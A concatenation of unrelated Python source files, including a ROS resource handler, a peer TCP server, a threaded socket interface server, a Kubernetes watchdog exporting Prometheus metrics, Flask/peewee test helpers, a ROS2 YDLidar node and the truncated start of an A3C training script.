return '/{}/resource/{}'.format(self.agent_id, self.resource_id)
@abc.abstractproperty
def action_type_cls(self):
pass
@abc.abstractproperty
def action_goal_cls(self):
pass
@abc.abstractmethod
def action_feedback_cls(self):
pass
@abc.abstractmethod
def fill_goal_info(self, *args, **kwargs):
pass
@abc.abstractmethod
def serialize_goal_results(self, *args, **kwargs):
pass
def log_request_done(self, *args, **kwargs):
pass
def run(self):
self.th = Thread(target=self._process_obligations)
self.th.setDaemon(True)
self.th.start()
def _shutdown(self):
""" Indicate exit with max priority """
self.is_alive = False
self._queue.put_nowait((-float('inf'), ''))
def _new_obligation(self, obl):
""" Put new obligations into to the processing queue """
# Store in queue
self._queue.put_nowait((obl.priority, obl))
# Log obligation arrival
self.loginfo('Queued obligation from agent {}. Queue length: {}'.format(
obl.req_agent, self._queue.qsize()))
def _process_obligations(self):
# Process forever
while True:
# Get the next obligation. If empty, block
priority, obl = self._queue.get(True)
# If no longer alive, exit
if not self.is_alive:
break
# If this obligation is not valid, skip
if not obl.valid:
self.loginfo('Invalid obligation.')
continue
# Log arrival
self.loginfo('Process obligation from agent {}. Queue length: {}'.format(
obl.req_agent, self._queue.qsize()))
res_status = (obl.req_agent, self.resource_id,
'start', rospy.get_time())
self.status_publisher.publish(json.dumps(res_status))
# Protect everything with a lock to avoid race conditions
with self.lock:
# Store current obligation
self.current_obligation = obl
# Create the new goal
goal = self.action_goal_cls()
# Add parameters to goal
goal = self.fill_goal_info(goal)
# Send out obligation to resource
self.ac.send_goal(goal, done_cb=self.request_done,
feedback_cb=self.request_feedback)
# If you want to preempt actions, continue
if self.preempt_actions:
continue
# Wait until the action has finished if no preemption is desired
self.semaphore.acquire()
def request_done(self, goal_status, goal_result):
""" Handles request completion """
# Update log
self.loginfo('Request done.')
res_status = (self.current_obligation.req_agent,
self.resource_id, 'end', rospy.get_time())
self.status_publisher.publish(json.dumps(res_status))
self.log_request_done(goal_result)
# Create a new result
result = Result.from_obligation(self.current_obligation,
srv_agent=self.agent_id,
values=self.serialize_goal_results(goal_result))
# Delete current obligation. Not needed anymore
with self.lock:
self.current_obligation = None
# Pass the new result to the dispatcher
self.dispatcher._new_result(result)
# If you are not managing preemption, you are done
if self.preempt_actions:
return
# Indicate that the action has finished
self.semaphore.release()
def request_feedback(self, msg):
""" Handles request feedback """
pass
def loginfo(self, msg, *args):
msg = msg.format(*args)
rospy.loginfo('[%s/%s_rhdlr]: %s', self.agent_id,
self.resource_id, msg)
def logwarn(self, msg, *args):
msg = msg.format(*args)
rospy.logwarn('[%s/%s_rhdlr]: %s', self.agent_id,
self.resource_id, msg)
def logerr(self, msg, *args):
msg = msg.format(*args)
rospy.logerr('[%s/%s_rhdlr]: %s', self.agent_id,
self.resource_id, msg)
def logdebug(self, msg, *args):
msg = msg.format(*args)
rospy.logdebug('[%s/%s_rhdlr]: %s', self.agent_id,
self.resource_id, msg)
# =====================================================================
# === Abstract Resource Handler for ROS Services
# =====================================================================
# TODO
|
server.py
|
# -*- coding: utf-8 -*-
"""
Peer Server Module
------------------
Contains the server engine for the peer.
"""
__all__ = ['PeerServer']
# std imports
import re
import json
import socket
import traceback
import threading
# compatibility
from six import add_metaclass
# package imports
import net
# package imports
from net.peer.handler import PeerHandler
from net.imports import socketserver, ConnectionRefusedError
# globals
SINGLETON = None
# utilities
ID_REGEX = re.compile(r"(?P<host>.+):(?P<port>\d+) -> (?P<group>.+)")
# threading
LOCK = threading.Lock()
class SingletonServer(type):
"""
This protects the server from being replicated unless it is for testing.
"""
instance = None
def __call__(cls, *args, **kwargs):
if kwargs.get('test'):
return super(SingletonServer, cls).__call__(*args, **kwargs)
if not cls.instance:
cls.instance = super(SingletonServer, cls).__call__(*args, **kwargs)
return cls.instance
# noinspection PyMissingConstructor
@add_metaclass(SingletonServer)
class PeerServer(socketserver.ThreadingMixIn, socketserver.TCPServer, object):
# adding to inheritance object for 2.7 support
"""
Base PeerServer class that handles all incoming and outgoing requests.
"""
@staticmethod
def ports():
"""
Generator; All ports defined in the environment.
:return: int
"""
return [port for port in range(net.PORT_START, net.PORT_START + net.PORT_RANGE)]
@staticmethod
def ping(port, host=socket.gethostname()):
"""
Ping a port and check if it is alive or open.
:param port: required port to hit
:param host: host address default is 'localhost'
:return: bool
"""
# sockets
interface = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
interface.settimeout(0.25)
try:
interface.connect((host, port))
interface.close()
return True
except (ConnectionRefusedError, socket.error):
return False
def __init__(self, test=False):
# descriptor
self._host = net.HOST_IP
self._port = self.scan_for_port()
# handle threading
self._thread = threading.Thread(target=self.serve_forever)
self._thread.daemon = True
# launch the server
self._thread.start()
@property
def port(self):
"""
Port that the peer is running on.
:return: int
"""
return self._port
@property
def host(self):
"""
Host that the peer is running on.
:return: str
"""
return self._host
def scan_for_port(self):
"""
Scan for a free port to bind to. You can override the default port range
and search range by setting the environment variables NET_PORT
NET_PORT_RANGE.
Port range:
default 3010-3050
:return: int
"""
# cast as int and default to 3010 and 40
port = net.PORT_START
port_range = port + net.PORT_RANGE
net.LOGGER.debug("Scanning {0} ports for open port...".format(port_range - port))
while port <= port_range:
# ping the local host ports
if not self.ping(port):
try:
super(PeerServer, self).__init__((self.host, port), PeerHandler)
net.LOGGER.debug("Stale Port: {0}".format(port))
except (OSError, socket.error):
continue
net.LOGGER.debug("Found Port: {0}".format(port))
return port
port += 1
# throw error if there is no open port
if port > port_range:
raise ValueError("No open port found between {0} - {1}".format(port, port_range))
@staticmethod
def request(host, port, connection, args, kwargs):
"""
Request an action and response from a peer.
:param host: target host ipv4 format
:param port: target port int
:param connection: the target connection id to run
:param args: positional arguments to pass to the target connection (must be json compatible)
:param kwargs: keyword arguments to pass to the target connection (must be json compatible)
:return: response from peer
"""
# socket connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# set the time out on the function
if kwargs.get('time_out'):
sock.settimeout(kwargs.get('time_out'))
# connect
sock.connect((host, port))
# convert the data to json and then bytes
data = {'connection': connection, 'args': args, 'kwargs': kwargs}
try:
data = json.dumps(data)
except TypeError:
data = str(data)
payload = data.encode('ascii')
try:
# send request
sock.sendall(payload)
# sock
raw = sock.recv(1024)
# safely close the socket
sock.close()
except Exception as err:
# safely close the socket
sock.close()
# handle error logging
net.LOGGER.error(traceback.format_exc())
raise err
response = raw.decode('ascii')
try:
return json.loads(response)
except Exception:
return response
def protected_request(self, host, port, connection, args, kwargs, stale):
"""
This allows for protected requests. Intended for threaded event calls.
.. warning::
INTERNAL USE ONLY
Do not use this directly, it will only cause you pain.
:param host: target host ipv4 format
:param port: target port int
:param connection: the target connection id to run
:param args: positional arguments to pass to the target connection (must be json compatible)
:param kwargs: keyword arguments to pass to the target connection (must be json compatible)
:param stale: share resource for detecting old peers
:return: response from peer
"""
try:
self.request(host, port, connection, args, kwargs)
except Exception as e:
if isinstance(e, ConnectionRefusedError):
# thread handling
LOCK.acquire()
stale.append((host, port))
LOCK.release()
else:
net.LOGGER.warning(
"An error has happened a remote peer. "
"This was a protected request and will "
"ignore the error response.\n\t"
"Peer: {0}".format((host, port))
)
|
interfaceserver.py
|
"""
This module provides an interface for interacting with long lasting calculations via a TCP socket.
"""
# source: http://stackoverflow.com/questions/23828264/
# how-to-make-a-simple-multithreaded-socket-server-in-python-that-remembers-client
import socket
import threading
import time
import Queue
from log import logging
from ipydex import IPS
# for data
msgqueue = Queue.Queue()
ctrlqueue = Queue.Queue()
running = False
listener = None
# Colloct all known messages here to avoid confusion
class MessageContainer(object):
def __init__(self):
self.lmshell_inner = "lmshell_inner"
self.lmshell_outer = "lmshell_outer"
self.plot_reslist = "plot_reslist"
self.change_x = "change_x"
# change the weight matrix
self.change_w = "change_w"
self.run_ivp = "run_ivp"
messages = MessageContainer()
server = []
client_list = []
threads = []
class ThreadedServer(object):
def __init__(self, host, port):
server.append(self)
self.host = host
self.port = port
confirmflag = False
for i in range(500):
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port+i))
break
except socket.error as err:
confirmflag = True
logging.warn("port {} already in use, increasing by 1.".format(self.port+i))
continue
logging.debug("Connected to localhost:{}".format(self.port + i))
if confirmflag:
raw_input("Press Enter.")
def listen(self):
self.sock.listen(5)
while True:
logging.info("listening")
# wait for an incomming connection
client, address = self.sock.accept()
if not ctrlqueue.empty():
msg = ctrlqueue.get()
ctrlqueue.task_done()
if "exit" in msg:
break
client.settimeout(None)
client_list.append(client)
sublistener = threading.Thread(target=self.listentoclient, args=(client, address))
threads.append(sublistener)
# end this thread if the main thread finishes
sublistener.daemon = True
sublistener.start()
def listentoclient(self, client, address):
size = 1024
while True:
try:
data = client.recv(size)
if data:
msgqueue.put(data)
else:
logging.info('Client disconnected')
client.close()
except IOError:
client.close()
return False
def start_stopable_thread(callable, dt=0.1, name=None):
"""
This function produces a function that starts a thread,
and then waits for a message to terminate
This contruction (with a parent thread that polls a queue)
allows to savely stop threads which perform blocking operations
:param callable: callable which will be the thread
:param dt: waiting time in seconds
"""
def thrdfnc():
thr = threading.Thread(target=callable)
if name is not None:
thr.name = name
threads.append(thr)
thr.daemon = True
thr.start()
while True:
if not ctrlqueue.empty():
msg = ctrlqueue.get()
ctrlqueue.task_done()
if "exit" in msg:
break
time.sleep(dt)
print "finish threads"
return thrdfnc
def listen_for_connections(port):
target = ThreadedServer('', port).listen
thrdfnc = start_stopable_thread(target, name="listen-thread")
thr = threading.Thread(target=thrdfnc)
threads.append(thr)
thr.daemon = True
thr.start()
# TODO: implement that flag without global keyword
global running
running = True
def stop_listening():
ctrlqueue.put("exit")
# time.sleep(2)
# IPS()
# server[-1].sock.close()
# time.sleep(2)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(server[-1].sock.getsockname())
sock.close()
server[-1].sock.close()
# TODO: implement that flag without global keyword
global running
running = False
def has_message(txt):
"""
Ask the server if a specific message has arrived.
Non-matching Messages are put back into the queue
:param txt: message to look for
:return: True or False
"""
if not running:
return False
if msgqueue.empty():
return False
msg = msgqueue.get()
if txt in msg:
return True
else:
msgqueue.put(msg)
def process_queue():
""""simulate to perform some work (for testing)"""
while True:
if msgqueue.empty():
logging.debug("empty queue")
else:
msg = msgqueue.get()
msgqueue.task_done()
logging.info("tcp-msg: %s" % str(msg))
if "exit" in msg:
break
time.sleep(1)
logging.info("finished")
if __name__ == "__main__":
PORT = input("Port? ")
listen_for_connections(PORT)
process_queue()
|
watchdog.py
|
#!/usr/bin/python
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import argparse
import urllib.parse
import os
import json
import sys
import requests
import logging
import time
import threading
import signal
import faulthandler
import gc
import paramiko
import yaml
import prometheus_client
from prometheus_client import Counter, Summary, Histogram
from prometheus_client.core import GaugeMetricFamily, CounterMetricFamily, Summary, REGISTRY
from prometheus_client.twisted import MetricsResource
from twisted.web.server import Site
from twisted.web.resource import Resource
from twisted.internet import reactor
logger = logging.getLogger(__name__)
##### watchdog will generate following metrics
# Document about these metrics is in `prometheus/doc/watchdog-metrics.md`
error_counter = Counter("process_error_log_total", "total count of error log", ["type"])
api_healthz_histogram = Histogram("k8s_api_healthz_resp_latency_seconds",
"Response latency for requesting k8s api healthz (seconds)")
# use `histogram_quantile(0.95, sum(rate(k8s_etcd_resp_latency_seconds_bucket[5m])) by (le))`
# to get 95 percentile latency in past 5 miniute.
etcd_healthz_histogram = Histogram("k8s_etcd_resp_latency_seconds",
"Response latency for requesting etcd healthz (seconds)")
list_pods_histogram = Histogram("k8s_api_list_pods_latency_seconds",
"Response latency for list pods from k8s api (seconds)")
list_nodes_histogram = Histogram("k8s_api_list_nodes_latency_seconds",
"Response latency for list nodes from k8s api (seconds)")
def gen_pai_pod_gauge():
return GaugeMetricFamily("pai_pod_count", "count of pai pod",
labels=["service_name", "name", "phase", "host_ip",
"initialized", "pod_scheduled", "ready"])
def gen_pai_container_gauge():
return GaugeMetricFamily("pai_container_count", "count of container pod",
labels=["service_name", "pod_name", "name", "state", "host_ip", "ready"])
def gen_pai_node_gauge():
return GaugeMetricFamily("pai_node_count", "count of pai node",
labels=["name", "disk_pressure", "memory_pressure", "out_of_disk", "ready"])
def gen_k8s_component_gauge():
return GaugeMetricFamily("k8s_component_count", "count of k8s component",
labels=["service_name", "error", "host_ip"])
##### watchdog will generate above metrics
class AtomicRef(object):
""" a thread safe way to store and get object, should not modify data get from this ref """
def __init__(self):
self.data = None
self.lock = threading.RLock()
def get_and_set(self, new_data):
data = None
with self.lock:
data, self.data = self.data, new_data
return data
def get(self):
with self.lock:
return self.data
class CustomCollector(object):
def __init__(self, atomic_ref):
self.atomic_ref = atomic_ref
def collect(self):
data = self.atomic_ref.get()
if data is not None:
for datum in data:
yield datum
else:
# https://stackoverflow.com/a/6266586
# yield nothing
return
yield
def catch_exception(fn, msg, default, *args, **kwargs):
""" wrap fn call with try catch, makes watchdog more robust """
try:
return fn(*args, **kwargs)
except Exception as e:
error_counter.labels(type="parse").inc()
logger.exception(msg)
return default
def parse_pod_item(pai_pod_gauge, pai_container_gauge, pod):
""" add metrics to pai_pod_gauge or pai_container_gauge if successfully paesed pod.
Because we are parsing json outputed by k8s, its format is subjected to change,
we should test if field exists before accessing it to avoid KeyError """
pod_name = pod["metadata"]["name"]
labels = pod["metadata"].get("labels")
if labels is None or "app" not in list(labels.keys()):
logger.warning("unkown pod %s", pod["metadata"]["name"])
return None
service_name = labels["app"] # get pai service name from label
status = pod["status"]
if status.get("phase") is not None:
phase = status["phase"].lower()
else:
phase = "unknown"
host_ip = "unscheduled" # can not specify None here, None will cause None exception
if status.get("hostIP") is not None:
host_ip = status["hostIP"]
initialized = pod_scheduled = ready = "unknown"
conditions = status.get("conditions")
if conditions is not None:
for cond in conditions:
cond_t = cond["type"] # Initialized|Ready|PodScheduled
cond_status = cond["status"].lower()
if cond_t == "Initialized":
initialized = cond_status
elif cond_t == "PodScheduled":
pod_scheduled = cond_status
elif cond_t == "Ready":
ready = cond_status
else:
error_counter.labels(type="unknown_pod_cond").inc()
logger.error("unexpected condition %s in pod %s", cond_t, pod_name)
pai_pod_gauge.add_metric([service_name, pod_name, phase, host_ip,
initialized, pod_scheduled, ready], 1)
# generate pai_containers
if status.get("containerStatuses") is not None:
container_statuses = status["containerStatuses"]
for container_status in container_statuses:
container_name = container_status["name"]
ready = False
if container_status.get("ready") is not None:
ready = container_status["ready"]
container_state = None
if container_status.get("state") is not None:
state = container_status["state"]
if len(state) != 1:
error_counter.labels(type="unexpected_container_state").inc()
logger.error("unexpected state %s in container %s",
json.dumps(state), container_name)
else:
container_state = list(state.keys())[0].lower()
pai_container_gauge.add_metric([service_name, pod_name, container_name,
container_state, host_ip, str(ready).lower()], 1)
return pai_pod_gauge, pai_container_gauge
def process_pods_status(pai_pod_gauge, pai_container_gauge, podsJsonObject):
def _map_fn(item):
return catch_exception(parse_pod_item,
"catch exception when parsing pod item",
None,
pai_pod_gauge, pai_container_gauge, item)
list(map(_map_fn, podsJsonObject["items"]))
def collect_healthz(gauge, histogram, service_name, address, port, url):
with histogram.time():
error = "ok"
try:
error = requests.get("http://{}:{}{}".format(address, port, url)).text
except Exception as e:
error_counter.labels(type="healthz").inc()
error = str(e)
logger.exception("requesting %s:%d%s failed", address, port, url)
gauge.add_metric([service_name, error, address], 1)
def collect_k8s_component(k8s_gauge, api_server_ip, api_server_port):
collect_healthz(k8s_gauge, api_healthz_histogram,
"k8s_api_server", api_server_ip, api_server_port, "/healthz")
collect_healthz(k8s_gauge, etcd_healthz_histogram,
"k8s_etcd", api_server_ip, api_server_port, "/healthz/etcd")
def parse_node_item(pai_node_gauge, node):
name = node["metadata"]["name"]
disk_pressure = memory_pressure = out_of_disk = ready = "unknown"
if node.get("status") is not None:
status = node["status"]
if status.get("conditions") is not None:
conditions = status["conditions"]
for cond in conditions:
cond_t = cond["type"]
status = cond["status"].lower()
if cond_t == "DiskPressure":
disk_pressure = status
elif cond_t == "MemoryPressure":
memory_pressure = status
elif cond_t == "OutOfDisk":
out_of_disk = status
elif cond_t == "Ready":
ready = status
else:
error_counter.labels(type="unknown_node_cond").inc()
logger.error("unexpected condition %s in node %s", cond_t, name)
else:
logger.warning("unexpected structure of node %s: %s", name, json.dumps(node))
pai_node_gauge.add_metric([name, disk_pressure, memory_pressure, out_of_disk, ready], 1)
return pai_node_gauge
def process_nodes_status(pai_node_gauge, nodesJsonObject):
def _map_fn(item):
return catch_exception(parse_node_item,
"catch exception when parsing node item",
None,
pai_node_gauge, item)
list(map(_map_fn, nodesJsonObject["items"]))
def load_machine_list(configFilePath):
with open(configFilePath, "r") as f:
return yaml.load(f)["hosts"]
def request_with_histogram(url, histogram):
with histogram.time():
return requests.get(url).json()
def try_remove_old_prom_file(path):
""" try to remove old prom file, since old prom file are exposed by node-exporter,
if we do not remove, node-exporter will still expose old metrics """
if os.path.isfile(path):
try:
os.unlink(path)
except Exception as e:
log.warning("can not remove old prom file %s", path)
def register_stack_trace_dump():
faulthandler.register(signal.SIGTRAP, all_threads=True, chain=False)
# https://github.com/prometheus/client_python/issues/322#issuecomment-428189291
def burninate_gc_collector():
for callback in gc.callbacks[:]:
if callback.__qualname__.startswith("GCCollector."):
gc.callbacks.remove(callback)
for name, collector in list(prometheus_client.REGISTRY._names_to_collectors.items()):
if name.startswith("python_gc_"):
try:
prometheus_client.REGISTRY.unregister(collector)
except KeyError: # probably gone already
pass
class HealthResource(Resource):
def render_GET(self, request):
request.setHeader("Content-Type", "text/html; charset=utf-8")
return "<html>Ok</html>".encode("utf-8")
def main(args):
register_stack_trace_dump()
burninate_gc_collector()
logDir = args.log
try_remove_old_prom_file(logDir + "/watchdog.prom")
address = args.k8s_api
parse_result = urllib.parse.urlparse(address)
api_server_scheme = parse_result.scheme
api_server_ip = parse_result.hostname
api_server_port = parse_result.port or 80
list_pods_url = "{}/api/v1/namespaces/default/pods/".format(address)
list_nodes_url = "{}/api/v1/nodes/".format(address)
atomic_ref = AtomicRef()
REGISTRY.register(CustomCollector(atomic_ref))
root = Resource()
root.putChild(b"metrics", MetricsResource())
root.putChild(b"healthz", HealthResource())
factory = Site(root)
reactor.listenTCP(int(args.port), factory)
t = threading.Thread(target=reactor.run, name="twisted")
t.daemon = True
t.start()
while True:
# these gauge is generate on each iteration
pai_pod_gauge = gen_pai_pod_gauge()
pai_container_gauge = gen_pai_container_gauge()
pai_node_gauge = gen_pai_node_gauge()
k8s_gauge = gen_k8s_component_gauge()
try:
# 1. check service level status
podsStatus = request_with_histogram(list_pods_url, list_pods_histogram)
process_pods_status(pai_pod_gauge, pai_container_gauge, podsStatus)
# 2. check nodes level status
nodes_status = request_with_histogram(list_nodes_url, list_nodes_histogram)
process_nodes_status(pai_node_gauge, nodes_status)
# 3. check k8s level status
collect_k8s_component(k8s_gauge, api_server_ip, api_server_port)
except Exception as e:
error_counter.labels(type="unknown").inc()
logger.exception("watchdog failed in one iteration")
atomic_ref.get_and_set([pai_pod_gauge, pai_container_gauge, pai_node_gauge,
k8s_gauge])
time.sleep(float(args.interval))
def get_logging_level():
mapping = {
"DEBUG": logging.DEBUG,
"INFO": logging.INFO,
"WARNING": logging.WARNING
}
result = logging.INFO
if os.environ.get("LOGGING_LEVEL") is not None:
level = os.environ["LOGGING_LEVEL"]
result = mapping.get(level.upper())
if result is None:
sys.stderr.write("unknown logging level " + level + ", default to INFO\n")
result = logging.INFO
return result
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("k8s_api", help="kubernetes api uri eg. http://10.151.40.133:8080")
parser.add_argument("--log", "-l", help="log dir to store log", default="/datastorage/prometheus")
parser.add_argument("--interval", "-i", help="interval between two collection", default="30")
parser.add_argument("--port", "-p", help="port to expose metrics", default="9101")
args = parser.parse_args()
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s",
level=get_logging_level())
main(args)
|
helpers.py
|
import multiprocessing
import time
import socket
import logging
import re
from contextlib import contextmanager
from playhouse.test_utils import _QueryLogHandler
from data.database import LogEntryKind, LogEntry3
class assert_action_logged(object):
"""
Specialized assertion for ensuring that a log entry of a particular kind was added under the
context of this call.
"""
def __init__(self, log_kind):
self.log_kind = log_kind
self.existing_count = 0
def _get_log_count(self):
return (
LogEntry3.select().where(LogEntry3.kind == LogEntryKind.get(name=self.log_kind)).count()
)
def __enter__(self):
self.existing_count = self._get_log_count()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_val is None:
updated_count = self._get_log_count()
error_msg = "Missing new log entry of kind %s" % self.log_kind
assert self.existing_count == (updated_count - 1), error_msg
class log_queries(object):
"""Logs all queries that occur under the context."""
def __init__(self, query_filters=None):
self.filters = query_filters
def get_queries(self):
queries = [q.msg[0] for q in self._handler.queries]
if not self.filters:
return queries
filtered_queries = []
for query_filter in self.filters:
filtered_queries.extend([q for q in queries if re.match(query_filter, q)])
return filtered_queries
def __enter__(self):
logger = logging.getLogger("peewee")
self._handler = _QueryLogHandler()
logger.setLevel(logging.DEBUG)
logger.addHandler(self._handler)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
logger = logging.getLogger("peewee")
logger.removeHandler(self._handler)
class check_transitive_modifications(log_queries):
"""Checks for Peewee-generated transition deletion queries and fails if any are found.
These kinds of queries (which use subqueries) can lock massively on MySQL, so we detect
them and fail.
"""
def __init__(self):
filters = [r"^DELETE.+IN \(SELECT.+$", r"^UPDATE.+IN \(SELECT.+$"]
super(check_transitive_modifications, self).__init__(query_filters=filters)
def __exit__(self, exc_type, exc_val, exc_tb):
super(check_transitive_modifications, self).__exit__(exc_type, exc_val, exc_tb)
queries = self.get_queries()
if queries:
raise Exception("Detected transitive deletion or update in queries: %s" % queries)
_LIVESERVER_TIMEOUT = 5
@contextmanager
def liveserver_app(flask_app, port):
"""
Based on https://github.com/jarus/flask-testing/blob/master/flask_testing/utils.py.
Runs the given Flask app as a live web server locally, on the given port, starting it
when called and terminating after the yield.
Usage:
with liveserver_app(flask_app, port):
# Code that makes use of the app.
"""
shared = {}
def _can_ping_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(("localhost", port))
except socket.error:
success = False
else:
success = True
finally:
sock.close()
return success
def _spawn_live_server():
worker = lambda app, port: app.run(port=port, use_reloader=False)
shared["process"] = multiprocessing.Process(target=worker, args=(flask_app, port))
shared["process"].start()
start_time = time.time()
while True:
elapsed_time = time.time() - start_time
if elapsed_time > _LIVESERVER_TIMEOUT:
_terminate_live_server()
raise RuntimeError(
"Failed to start the server after %d seconds. " % _LIVESERVER_TIMEOUT
)
if _can_ping_server():
break
def _terminate_live_server():
if shared.get("process"):
shared.get("process").terminate()
shared.pop("process")
try:
_spawn_live_server()
yield
finally:
_terminate_live_server()
|
ydlidar_node.py
|
import time
import threading
import math
import traceback
from sensor_msgs.msg import LaserScan
import rclpy
from rclpy.node import Node
from rcl_interfaces.msg import ParameterDescriptor
from .driver import YDLidar
from .parser import YDLidarScanParser
from .logging_rclpy import *
class YDLidarNode(Node):
def __init__(self):
super().__init__("ydlidar")
self.pub = self.create_publisher(LaserScan, "scan", 10)
self.declare_parameter("device", "/dev/ttyUSB0", ParameterDescriptor(read_only=True))
# The lidar has autobaud so any baud rate is OK
# Rates higher than 115200 seems to have no effect
self.declare_parameter("baudrate", 115200, ParameterDescriptor(read_only=True))
device = self.get_parameter("device").get_parameter_value().string_value
baudrate = self.get_parameter("baudrate").get_parameter_value().integer_value
self.lidar = YDLidar(device, baudrate)
log_info(f"Device: {device} {baudrate}")
self.parser = YDLidarScanParser()
self.motor_hz = self.lidar.get_motor_hz()
self.declare_parameter("motor_hz", self.motor_hz, ParameterDescriptor(read_only=True))
log_info(f"Motor Hz: {self.motor_hz}")
self.laser_hz = self.lidar.get_laser_hz()
self.declare_parameter("laser_hz", self.laser_hz, ParameterDescriptor(read_only=True))
log_info(f"Laser Hz: {self.laser_hz}")
self.status_interval = 1
self.last_status = time.time()
self.points_received = 0
self.last_end = 0
self.one_msg_per_rev = True
self.saved_outputs = []
self.declare_parameter("msg_frame_id", "map")
self.msg_frame_id = self.get_parameter("msg_frame_id").get_parameter_value().string_value
def update_params(self):
self.msg_frame_id = self.get_parameter("msg_frame_id").get_parameter_value().string_value
def spin_once(self):
if time.time() - self.last_status > self.status_interval:
log_info(f"{self.points_received} points per second")
self.points_received = 0
self.last_status = time.time()
input_byte = next(self.lidar.read_byte())
if len(input_byte) != 1:
log_warning("Timeout from serial")
return
if self.parser.state == self.parser.state.FINDING_HEADER:
log_debug3(f"HEAD {input_byte}")
self.parser.run_once(input_byte)
if not self.parser.output_ready():
return
output = self.parser.read_output()
if not self.one_msg_per_rev:
# Send this one output only
self.send_msg(output)
self.update_params()
return
else:
# Check if its a new rev
if not self.parser.new_rev:
self.saved_outputs += [output]
return
# See if there is output to send
if len(self.saved_outputs) == 0:
self.parser.new_rev = False
self.saved_outputs = []
return
# Assemble real output
output2 = [None] * 4
output2[0] = self.saved_outputs[0][0]
output2[1] = self.saved_outputs[-1][0]
output2[3] = [x[3] for x in self.saved_outputs]
output2[3] = [x for y in output2[3] for x in y]
log_debug(f"Points per revolution: {len(output2[3])}")
log_debug2(f"Gaps: {[b[0] - a[1] for a, b in zip(self.saved_outputs[:-1], self.saved_outputs[1:])]}")
# Seems this give more stable scans
output2[2] = sum(o[2] for o in self.saved_outputs) / len(self.saved_outputs)
output2[1] = output2[0] + output2[2] * (len(output2[3]) - 1)
self.send_msg(output2)
# Reset flag
self.parser.new_rev = False
self.saved_outputs = []
self.update_params()
return
def send_msg(self, output):
msg = LaserScan()
msg.header.frame_id = self.msg_frame_id
msg.header.stamp.sec = int(self.parser.packet_start)
self.last_end = output[1]
msg.angle_min = math.radians(output[0])
msg.angle_max = math.radians(output[1])
msg.angle_increment = math.radians(output[2])
msg.time_increment = 1 / self.laser_hz
msg.scan_time = 1 / self.motor_hz
msg.range_min = 0.1
msg.range_max = 16.0
# Output from lidar is in mm but ROS expects m
msg.ranges = [o / 1000 for o in output[3]]
self.points_received += len(msg.ranges)
self.pub.publish(msg)
def node_main(args=None):
rclpy.init(args=args)
logger = rclpy.logging.get_logger("ydlidar")
node = YDLidarNode()
# The serial port saturates at around 4700 Hz
# Faster Hz leads to dropped samples
node.lidar.set_laser_hz(4000)
# Set motor Hz to as high as possible
node.lidar.set_motor_hz(10)
rclpy_spin_thread = threading.Thread(target=rclpy.spin, args=(node,))
rclpy_spin_thread.start()
with node.lidar:
while rclpy.ok():
node.spin_once()
node.destroy_node()
rclpy.shutdown()
# main() is called directly by ROS2
def main(args=None):
try:
node_main(args=args)
except:
traceback.print_exc()
log_info("Shutting down")
rclpy.shutdown()
if __name__ == "__main__":
main()
|
a_pg.py
|
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
import gym_sandbox
import multiprocessing
import time
GAME = 'police-killall-trigger-3dgrid-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_GLOBAL_EP = 300000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 20
GAMMA = 0.9
ENTROPY_BETA = 0.01
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
MIN_P = 1e-6
RUN_MODE = "training" # execution
env = gym.make(GAME)
_s = env.reset()
N_S = list(_s.shape) #
N_A = env.action_space.n
WIDTH = _s.shape[0]
class ACNet(object):
global_step = tf.Variable(0, trainable=False, name="step")
def __init__(self, scope, globalAC=None):
self.scope = scope
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None]+N_S, 'S')
self._build_net()
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
#self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
else: # local net, calculate losses
with tf.variable_scope(scope):
#self.global_step = tf.Variable(0, trainable=False, name="global step")
self.s = tf.placeholder(tf.float32, [None]+N_S, 'S')
self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
self.a_prob = self._build_net()
self.a_prob = (self.a_prob+MIN_P)/(1+N_A*MIN_P)
#td = tf.subtract(self.v_target, self.v, name='TD_error')
# with tf.name_scope('c_loss'):
# self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('a_loss'):
